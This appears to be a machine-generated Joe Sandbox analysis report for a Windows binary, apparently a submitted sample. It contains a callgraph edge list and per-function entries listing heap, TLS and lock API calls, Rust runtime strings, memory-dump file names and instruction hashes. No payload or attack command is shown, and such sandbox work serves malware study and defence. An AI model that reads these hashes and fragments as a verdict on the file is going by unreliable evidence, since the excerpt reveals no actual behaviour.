2424 c7e921 2423->2424 2424->2422 2426 c71359 2425->2426 2427 d9c040 78 API calls 2426->2427 2428 c71405 2427->2428 2430 c71434 2428->2430 2433 c66f30 2430->2433 2435 c66f4e 2433->2435 2434 c6738d 2436 d9bf20 78 API calls 2434->2436 2437 c672ae 2434->2437 2435->2434 2435->2437 2438 d9bfe0 78 API calls 2435->2438 2439 c6728f 2435->2439 2436->2439 2438->2434 2439->2437 2440 d9bf20 78 API calls 2439->2440 2442 c673c9 2439->2442 2440->2442 2441 d9bf20 78 API calls 2443 c6752e 2441->2443 2442->2437 2442->2441 2445 c67543 2443->2445 2447 c67742 2445->2447 2450 c67554 2445->2450 2446 c67767 2446->2447 2448 d9bf20 78 API calls 2446->2448 2449 c6787a 2448->2449 2451 d9bfe0 78 API calls 2449->2451 2450->2446 2450->2447 2452 d9bf20 78 API calls 2450->2452 2455 c67659 2450->2455 2453 c67888 2451->2453 2452->2446 2454 d9bf20 78 API calls 2453->2454 2454->2455 2455->2447 2456 d9bf20 78 API calls 2455->2456 2457 c678a7 2456->2457 2482 da6470 2458->2482 2459 da6695 2463 da66b7 2459->2463 2460 da64a0 2464 d9bef0 75 API calls 2460->2464 2461 da66cc 2461->2062 2462 da64c3 2467 d9c040 75 API calls 2462->2467 2507 c620b0 2463->2507 2464->2462 2465 da64e7 TlsGetValue 2465->2482 2468 da6798 2467->2468 2470 da67b7 2468->2470 2473 c62260 2 API calls 2468->2473 2469 da651d TlsGetValue 2469->2482 2470->2062 2471 da6800 75 API calls 2471->2482 2472 a71220 3 API calls 2472->2482 2473->2470 2474 da6530 2521 d9c380 2474->2521 2475 c61b80 75 API calls 2475->2482 2476 da6734 2478 d9bae0 75 API calls 2476->2478 2478->2460 2479 da6660 2486 c622a0 2479->2486 2480 da66dd 2481 d9bef0 75 API calls 2480->2481 2481->2474 2482->2459 2482->2460 2482->2461 2482->2462 2482->2465 2482->2469 2482->2471 2482->2472 2482->2474 2482->2475 2482->2476 2482->2479 2482->2480 2484 da657b TlsSetValue 2482->2484 2485 c62260 HeapFree HeapFree 2482->2485 2484->2482 2485->2482 2487 c62420 76 API calls 2486->2487 2488 c622d9 2487->2488 2489 c622e1 2488->2489 2490 c6238c 2488->2490 2492 c622fe 2489->2492 2497 c62316 2489->2497 2498 c62314 2489->2498 2491 d9c380 76 API calls 2490->2491 2493 c623a0 2491->2493 2496 c62300 WaitOnAddress 2492->2496 2524 c624f0 2493->2524 2494 c6237b 2494->2482 2495 c62260 2 API calls 2495->2494 2496->2496 2496->2498 2497->2498 2501 c623a5 2497->2501 2502 c62340 2497->2502 2498->2494 2498->2495 2504 d9bef0 76 API calls 2501->2504 2502->2498 2505 c62352 CloseHandle 2502->2505 2504->2493 2505->2498 2508 c62219 2507->2508 2519 c620f0 2507->2519 2531 da69c0 2508->2531 2509 c620f5 2509->2461 2511 c62238 2513 c62257 2511->2513 2515 c62260 2 API calls 2511->2515 2512 c621b8 2514 d9c040 77 API calls 2512->2514 2513->2461 2516 c621d3 2514->2516 2515->2513 2518 d9bef0 77 API calls 2516->2518 2517 c62260 2 API calls 2517->2519 2518->2508 2519->2509 2519->2512 2519->2516 2519->2517 2520 c62192 CloseHandle 2519->2520 2520->2519 2522 d9bef0 78 API calls 2521->2522 2523 d9c3cf 2522->2523 2525 c61d20 2 API calls 2524->2525 2526 c6253a 2525->2526 2527 c61e80 2 API calls 2526->2527 2528 c6254a GetModuleHandleA 2527->2528 2529 c6257e 2528->2529 2530 c6256f GetProcAddress 2528->2530 2530->2529 2532 d9c0b0 78 API calls 2531->2532 2533 da69ee 2532->2533 2534 da69fa 2533->2534 2535 da6430 78 API calls 2533->2535 2534->2511 2536 da6a3a 2535->2536 2536->2511 2537 da6430 2561 da6470 2537->2561 2538 da6695 2542 da66b7 2538->2542 2539 da64a0 2543 d9bef0 75 API calls 2539->2543 2540 da66cc 2541 da64c3 2546 d9c040 75 API calls 2541->2546 2545 c620b0 75 API calls 2542->2545 2543->2541 2544 da64e7 TlsGetValue 2544->2561 2545->2540 2547 da6798 2546->2547 2549 da67b7 2547->2549 2552 c62260 2 API calls 2547->2552 2548 da651d TlsGetValue 2548->2561 2550 da6800 75 API calls 2550->2561 2551 a71220 3 API calls 2551->2561 2552->2549 2553 da6530 2556 d9c380 75 API calls 2553->2556 2554 c61b80 75 API calls 2554->2561 2555 da6734 2557 d9bae0 75 API calls 2555->2557 2556->2555 2557->2539 2558 da6660 2562 c622a0 75 API calls 2558->2562 2559 da66dd 2560 d9bef0 75 API calls 2559->2560 2560->2553 2561->2538 2561->2539 2561->2540 2561->2541 2561->2544 2561->2548 2561->2550 2561->2551 2561->2553 2561->2554 2561->2555 2561->2558 2561->2559 2563 da657b TlsSetValue 2561->2563 2564 c62260 HeapFree HeapFree 2561->2564 2562->2561 2563->2561 2564->2561 2565 d96992 2568 d97420 2565->2568 2567 d96997 2567->2567 2569 d97436 2568->2569 2571 d9743f 2569->2571 2572 d973d3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 2569->2572 2571->2567 2572->2571

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_00C67543 32 Function_00D9BFE0 0->32 50 Function_00C67925 0->50 73 Function_00D9BF20 0->73 1 Function_00C63BC0 6 Function_00A71220 1->6 33 Function_00D9BAE0 1->33 49 Function_00DA6800 1->49 2 Function_00C71340 9 Function_00C7134F 2->9 3 Function_00A72D20 15 Function_00A72D30 3->15 4 Function_00A72C20 4->3 5 Function_00C7CA40 5->6 29 Function_00D9BEF0 5->29 5->33 46 Function_00D9C380 5->46 5->49 7 Function_00C79D40 7->29 34 Function_00D9C460 7->34 8 Function_00C80240 8->6 8->33 35 Function_00DA6EE0 8->35 41 Function_00C79D00 8->41 8->49 72 Function_00C80230 8->72 16 Function_00D9C040 9->16 63 Function_00C71434 9->63 10 Function_00D9C3D0 28 Function_00C7E9E0 10->28 10->34 11 Function_00D973D3 12 Function_00DA6950 60 Function_00D9C0B0 12->60 13 Function_00A6E630 13->6 14 Function_00A78030 67 Function_00A73250 15->67 16->29 16->60 17 Function_00D9C540 26 Function_00A7B200 17->26 18 Function_00D97940 19 Function_00DA69C0 19->60 61 Function_00DA6430 19->61 20 Function_00DA6A40 20->29 20->33 39 Function_00A6E560 20->39 64 Function_00C64830 20->64 21 Function_00C626E0 21->4 21->6 22 Function_00C62260 21->22 21->33 43 Function_00A7A170 21->43 21->49 59 Function_00A803C0 21->59 23 Function_00D9BCFF 23->6 23->28 23->29 23->33 36 Function_00A815E9 23->36 23->39 23->60 69 Function_00C71330 23->69 24 Function_00C6FDE0 24->6 24->33 24->49 51 Function_00B3D250 24->51 25 Function_00A71280 25->18 26->16 26->17 26->29 44 Function_00D9C200 26->44 27 Function_00C7DF60 70 Function_00C7E830 27->70 28->16 58 Function_00C7EA20 28->58 29->28 30 Function_00D9C470 30->10 30->29 30->60 31 Function_00C624F0 38 Function_00C61E80 31->38 52 Function_00C61D20 31->52 32->29 33->6 33->13 33->28 33->29 33->33 33->36 33->39 56 Function_00A71340 33->56 33->60 33->69 34->30 35->5 35->6 35->22 35->33 45 Function_00D9C300 35->45 35->46 53 Function_00C62420 35->53 36->6 36->25 37 Function_00D9801A 39->29 40 Function_00C61B80 40->6 40->20 40->33 41->22 42 Function_00D96992 74 Function_00D97420 42->74 43->3 43->14 43->73 44->29 45->29 46->29 47 Function_00D9BF80 47->29 48 Function_00DA6980 48->60 49->12 49->29 49->48 50->37 68 Function_00A741D0 52->68 53->21 53->29 53->40 54 Function_00C622A0 54->22 54->29 54->31 54->46 54->53 55 Function_00C7DE20 55->52 56->8 56->18 56->23 56->32 56->44 56->47 57 Function_00C7EB20 57->1 57->2 57->22 57->24 57->27 57->38 57->45 57->51 57->52 57->53 62 Function_00DA6BB0 57->62 57->69 71 Function_00C7EA30 58->71 59->3 59->73 60->29 61->6 61->16 61->22 61->29 61->33 61->40 61->46 61->49 61->54 65 Function_00C620B0 61->65 62->1 62->45 62->61 66 Function_00C66F30 63->66 64->6 64->25 65->16 65->19 65->22 65->29 66->0 66->32 66->73 70->62 71->57 72->6 72->33 72->35 72->41 72->49 72->55 72->72 73->29 74->11

                                                                        Executed Functions

                                                                        Function 00A71220 Relevance: 4.5, APIs: 3, Instructions: 39memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 110 a71220-a7122d 111 a71240-a71248 GetProcessHeap 110->111 112 a7122f-a71232 110->112 115 a71275 111->115 116 a7124a-a71252 111->116 113 a71254-a71262 RtlAllocateHeap 112->113 114 a71234-a7123e RtlAllocateHeap 112->114 113->115 118 a71264-a71273 113->118 117 a71279-a7127b 114->117 119 a71277 115->119 116->113 116->114 118->119 119->117
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,0000000C,?,?,?,?,?,?,?,?,?,?), ref: 00A71238
                                                                        • GetProcessHeap.KERNEL32(?,?,00DA6556,?,?,?,?,?,?,?,?,?,?), ref: 00A71240
                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,0000000C,?,?,?,?,?,?,?,?,?,?), ref: 00A7125A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$Allocate$Process
                                                                        • String ID:
                                                                        • API String ID: 980559045-0
                                                                        • Opcode ID: 17a991c33082610db007b501db5d0799e96db454d307f927510aecf4562a1c67
                                                                        • Instruction ID: 66d3a9296743cde1a3b514af4cc021fd56be6c98d1a53f325615126485b01cae
                                                                        • Opcode Fuzzy Hash: 17a991c33082610db007b501db5d0799e96db454d307f927510aecf4562a1c67
                                                                        • Instruction Fuzzy Hash: 16F0BB717042115BDF2457BEAC08BDB67E8A786750B15C43DF50ED7291EA70C800C6E4
                                                                        Function 00C79D40 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96memorythreadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • SetThreadStackGuarantee.KERNELBASE(?), ref: 00C79D78
                                                                        • GetLastError.KERNEL32 ref: 00C79D82
                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 00C79DCB
                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00C79DDC
                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00C79E6D
                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00C79E7E
                                                                        Strings
                                                                        • chunk size must be non-zero, xrefs: 00C79E14
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID: FreeHeap$ErrorGuaranteeLastStackThread
                                                                        • String ID: chunk size must be non-zero
                                                                        • API String ID: 3680998240-1054586041
                                                                        • Opcode ID: 6d4916a39b9d00cbb8fdbbe4e74cc0a0588841940a2a531a887049c8584eb139
                                                                        • Instruction ID: 1b794160020a248af6bf7e34b5f3ec3dd95bd2d1c6025283e171037d098bf6eb
                                                                        • Opcode Fuzzy Hash: 6d4916a39b9d00cbb8fdbbe4e74cc0a0588841940a2a531a887049c8584eb139
                                                                        • Instruction Fuzzy Hash: 0A4115759002089FDF10DF98EC49BEDBBB5FB08704F108525E819AB3A0D375A948CFA5
                                                                        Function 00DA6430 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 220COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 18 da6430-da6464 19 da6475-da647a 18->19 20 da648f-da6493 19->20 21 da6480-da6489 20->21 22 da6495-da6498 20->22 21->20 25 da6695-da66b1 21->25 23 da649a-da649e 22->23 24 da64b0-da64b3 22->24 23->21 26 da64a0 23->26 27 da64b9-da64c1 24->27 28 da66cc-da66dc 24->28 32 da66b7-da66c7 call c620b0 25->32 29 da674a-da677a call d9bef0 26->29 30 da64da-da64e1 27->30 31 da64c3 27->31 33 da677f-da67ad call d9c040 29->33 35 da6618-da6629 call da6800 30->35 36 da64e7-da64f2 TlsGetValue 30->36 31->33 32->28 47 da67af-da67b2 call c62260 33->47 48 da67b7-da67bb 33->48 45 da662e-da663f call da6800 35->45 40 da6510-da6517 36->40 41 da64f4-da64fa 36->41 40->45 46 da651d-da6527 TlsGetValue 40->46 41->40 44 da64fc-da64ff 41->44 49 da65b0-da65b4 44->49 73 da6644-da6655 call da6800 45->73 51 da6529-da652e 46->51 52 da6540-da6558 call a71220 46->52 47->48 55 da65cf-da65d2 49->55 56 da65b6-da65c7 call c61b80 49->56 58 da6583-da659b 51->58 59 da6530 51->59 66 da655e-da6574 52->66 67 da6734-da6745 call d9bae0 52->67 61 da65d8-da65f3 55->61 62 da6717 55->62 82 da66dd-da6712 call d9bef0 56->82 83 da65cd 56->83 58->49 63 da659d-da659f 58->63 65 da6719-da672f call d9c380 59->65 68 da666c-da6672 61->68 69 da65f5-da65fc 61->69 62->65 63->49 71 da65a1-da65a4 63->71 65->67 66->73 75 da657a 66->75 67->29 79 da6660-da6667 call c622a0 68->79 80 da6674-da6679 68->80 76 da6602-da6605 69->76 77 da64d0-da64d8 69->77 71->49 81 da65a6-da65ab call c62260 71->81 87 da657b-da657d TlsSetValue 73->87 75->87 76->77 88 da660b-da6613 call c62260 76->88 77->30 90 da6470-da6473 77->90 79->68 89 da667f-da6682 80->89 80->90 81->49 82->62 83->55 87->58 88->77 89->90 93 da6688-da6690 call c62260 89->93 90->19 93->90
                                                                        Strings
                                                                        • use of std::thread::current() is not possible after the thread's local data has been destroyed, xrefs: 00DA6720
                                                                        • chunk size must be non-zero, xrefs: 00DA66FA, 00DA6765
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: chunk size must be non-zero$use of std::thread::current() is not possible after the thread's local data has been destroyed
                                                                        • API String ID: 0-991767630
                                                                        • Opcode ID: b709d725baf93c51e773718bd4810efef31937e4c6d2cca69b93ee0cac800ef0
                                                                        • Instruction ID: 910e7274107adf942537d16ce79551685e4b79f54330e175ede6b0b079e4367a
                                                                        • Opcode Fuzzy Hash: b709d725baf93c51e773718bd4810efef31937e4c6d2cca69b93ee0cac800ef0
                                                                        • Instruction Fuzzy Hash: B79159B1A01219CBCF20DFA4C8457AEBBB5FB46324F1C4269E465AB3D1DB75D901CBA0
                                                                        Function 00A71280 Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 98 a71280-a71291 99 a712a5-a712ae 98->99 100 a71293-a712a3 RtlReAllocateHeap 98->100 102 a712b0-a712b8 GetProcessHeap 99->102 103 a712bf-a712cf HeapAlloc 99->103 101 a71309-a7130d 100->101 104 a71305 102->104 105 a712ba 102->105 103->104 106 a712d1-a71303 call d97940 HeapFree 103->106 107 a71307 104->107 105->103 106->107 107->101
                                                                        APIs
                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,?,?,?,00000000,?,00C6485D,00000000,?,?,00000004,?,00DA6AE0,00000000), ref: 00A7129D
                                                                        • GetProcessHeap.KERNEL32(?,?,00000000,?,00C6485D,00000000,?,?,00000004,?,00DA6AE0,00000000), ref: 00A712B0
                                                                        • HeapAlloc.KERNEL32(012F0000,00000000,?,?,?,00000000,?,00C6485D,00000000,?,?,00000004,?,00DA6AE0,00000000), ref: 00A712C7
                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00A712FD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocAllocateFreeProcess
                                                                        • String ID:
                                                                        • API String ID: 3553877500-0
                                                                        • Opcode ID: 2375b397cc911aa4b93b6b569badc48464ecae3cbf78e305ca457c273b674e61
                                                                        • Instruction ID: 9bd0a0bff54e9e0a7bd7258c1bae1a38c712d585293dd9a4bb15c6d8ebd4a490
                                                                        • Opcode Fuzzy Hash: 2375b397cc911aa4b93b6b569badc48464ecae3cbf78e305ca457c273b674e61
                                                                        • Instruction Fuzzy Hash: 3801C471704301AFDB109FAAFC84B6B7BE9EB45354F118539F409D6691EB609804C7A0
                                                                        Function 00A6E630 Relevance: 1.5, APIs: 1, Instructions: 45memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 120 a6e630-a6e63a 121 a6e667-a6e66e 120->121 122 a6e63c-a6e63e 120->122 123 a6e692-a6e695 121->123 124 a6e697 122->124 125 a6e640-a6e648 122->125 126 a6e69e-a6e6a3 123->126 124->126 127 a6e670-a6e672 125->127 128 a6e64a-a6e64e 125->128 131 a6e6b2-a6e6b6 126->131 129 a6e674-a6e689 call a71220 127->129 130 a6e6a5 127->130 128->127 132 a6e650-a6e663 RtlReAllocateHeap 128->132 134 a6e6aa-a6e6b0 129->134 137 a6e68b 129->137 130->134 132->134 135 a6e665 132->135 134->131 135->137 137->123
                                                                        APIs
                                                                        • RtlReAllocateHeap.NTDLL(00000000,?,?,?,00000008,00D9BB46,00000008), ref: 00A6E65B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 7fbf129751144f42c01027844cdd43e1698b65de5f121e18af39eaaa71dda610
                                                                        • Instruction ID: db536ad364dc05362453e3e04fb2dbafa5912e168f80a02367775915ce043490
                                                                        • Opcode Fuzzy Hash: 7fbf129751144f42c01027844cdd43e1698b65de5f121e18af39eaaa71dda610
                                                                        • Instruction Fuzzy Hash: 4C01087C2046018FD721CF19D914752BBF1EBA0704F25C82EE85A8B6A5D7B6E884DB51

                                                                        Non-executed Functions

                                                                        Function 00C7EB20 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 418COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 181 c7eb20-c7eb71 182 c7eb77-c7eb82 call c63bc0 181->182 183 c7f072-c7f0ee call c61d20 181->183 189 c7eb84-c7eb9c call d9c300 182->189 190 c7eba1-c7eba5 182->190 188 c7f138-c7f165 call c61e80 183->188 200 c7f167-c7f16a 188->200 201 c7f171-c7f179 188->201 189->190 193 c7f0f0-c7f135 call c61d20 190->193 194 c7ebab-c7ebf5 AcquireSRWLockShared 190->194 193->188 197 c7ebfb-c7ec21 194->197 198 c7ed49-c7ed7a 194->198 205 c7ec27-c7ec74 197->205 206 c7edcc-c7eddd call c63bc0 197->206 212 c7ed7d-c7ed9d ReleaseSRWLockShared call c63bc0 198->212 200->201 204 c7f16c call c62260 200->204 204->201 215 c7ee0c-c7ee4c 205->215 216 c7ec7a-c7eca1 call c62420 205->216 213 c7ede3-c7ee07 call d9c300 206->213 214 c7ee79-c7ee7c 206->214 227 c7eda3-c7edc7 call d9c300 212->227 228 c7ee61-c7ee69 212->228 230 c7f02e 213->230 218 c7eee5-c7eef4 call c71340 214->218 219 c7ee7e 214->219 234 c7ee52-c7ee5a 215->234 235 c7ef3b-c7ef40 215->235 231 c7ecb3-c7ecda 216->231 232 c7eca3-c7eca8 216->232 242 c7eefc-c7ef14 call c6fde0 218->242 229 c7ee87-c7eee3 call c61d20 call c61e80 219->229 227->230 228->229 236 c7ee6b-c7ee74 call c71330 228->236 229->218 239 c7f030-c7f045 call da6bb0 230->239 241 c7ece0-c7ed1c call c7df60 231->241 231->242 232->231 240 c7ecaa-c7ecb2 232->240 234->228 245 c7ef4a-c7ef54 235->245 236->230 259 c7f047-c7f04e 239->259 260 c7efcd-c7efee ReleaseSRWLockExclusive call c6fde0 239->260 240->231 261 c7ed1e-c7ed21 241->261 262 c7ed28-c7ed2f 241->262 242->245 263 c7ef16-c7ef36 call d9c300 242->263 245->241 251 c7ef5a-c7ef74 AcquireSRWLockExclusive 245->251 256 c7ef76-c7ef7d 251->256 257 c7ef7f-c7ef97 call da6bb0 251->257 265 c7ef9a-c7efbf call c7df60 256->265 257->265 259->260 276 c7f053-c7f05e 260->276 277 c7eff0-c7eff6 260->277 261->262 268 c7ed23 call c62260 261->268 262->212 264 c7ed31-c7ed34 262->264 263->230 264->212 271 c7ed36-c7ed47 call b3d250 264->271 265->260 285 c7efc1-c7efcb 265->285 268->262 271->212 283 c7f060-c7f063 276->283 284 c7f06a 276->284 280 c7f000-c7f02b call d9c300 277->280 281 c7eff8-c7effb call b3d250 277->281 280->230 281->280 283->284 288 c7f065 call b3d250 283->288 284->183 285->239 285->260 288->284
                                                                        APIs
                                                                          • Part of subcall function 00C63BC0: TlsGetValue.KERNEL32(00000000,?,00C7EB80), ref: 00C63BD0
                                                                        • AcquireSRWLockShared.KERNEL32(00EDF9F4), ref: 00C7EBDE
                                                                        • ReleaseSRWLockShared.KERNEL32(00EDF9F4), ref: 00C7ED82
                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00C7EFD0
                                                                          • Part of subcall function 00C62260: HeapFree.KERNEL32(00000000,00000000,?,00C7F171), ref: 00C6227C
                                                                          • Part of subcall function 00C62260: HeapFree.KERNEL32(00000000,?,?,00C7F171), ref: 00C62296
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID: Lock$FreeHeapReleaseShared$AcquireExclusiveValue
                                                                        • String ID: Box<dyn Any><unnamed>$D$cannot access a Thread Local Storage value during or after destruction/rustc/07dca489ac2d933c78d3c5158e3f43beefeb02ce\library\std\src\thread\local.rs$chunk size must be non-zero
                                                                        • API String ID: 1439667220-2585211334
                                                                        • Opcode ID: 348da9141301ce315ef42d7827a12a41883d3181f9d76fb5324608abe139f5d2
                                                                        • Instruction ID: e0e688e02e139db745d3680a9751ebced30d2d7dfd751d1b059b07f9a35af620
                                                                        • Opcode Fuzzy Hash: 348da9141301ce315ef42d7827a12a41883d3181f9d76fb5324608abe139f5d2
                                                                        • Instruction Fuzzy Hash: 0A0266B1504B408FD731CF25C485753BBE0AF99308F148A6DD8AA9BB82D7B5F509CBA1
                                                                        Function 00C66F30 Relevance: 3.0, Strings: 2, Instructions: 459COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1849429439.0000000000A51000.00000020.00000001.01000000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1849398359.0000000000A50000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DAA000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849683321.0000000000DF9000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849813447.0000000000EDB000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849838645.0000000000EDE000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849865833.0000000000EDF000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1849892662.0000000000EE1000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a50000_888.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: UNC\$chunk size must be non-zero
                                                                        • API String ID: 0-4000572898
